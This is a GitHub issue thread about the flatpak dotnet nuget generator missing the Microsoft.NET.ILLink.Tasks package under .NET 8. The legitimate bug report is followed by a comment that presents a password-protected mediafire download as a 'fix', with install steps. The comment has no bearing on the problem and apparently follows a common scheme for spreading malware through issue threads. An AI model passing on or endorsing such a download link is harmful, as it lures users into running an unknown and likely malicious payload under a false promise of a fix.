### ISSUE TITLE
nuget: does not download all dependencies needed for publish

### ISSUE THREAD

**Issue by theCapypara** [flatpak/flatpak-builder-tools#420]
### flatpak-builder version

1.4.4

### Linux distribution and version

NixOS (running via Flatpak)

### Affected flatpak-builder tool

dotnet/flatpak-dotnet-generator.py

### flatpak-builder tool cli args

    --runtime=linux-x64 \     --dotnet=8 --freedesktop=23.08 --destdir=nuget-sources-linux-x64

### Description

With .NET 8 the nuget builder does not download the required package `Microsoft.NET.ILLink.Tasks`, because `dotnet restore` does not download it. It is only downloaded when running `dotnet publish`.

The Ryujinx team ran into this https://github.com/Ryujinx/Ryujinx/commit/388446c255566d67240905bc6efa7af5a71c34b5 and so have I trying to package another app.

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
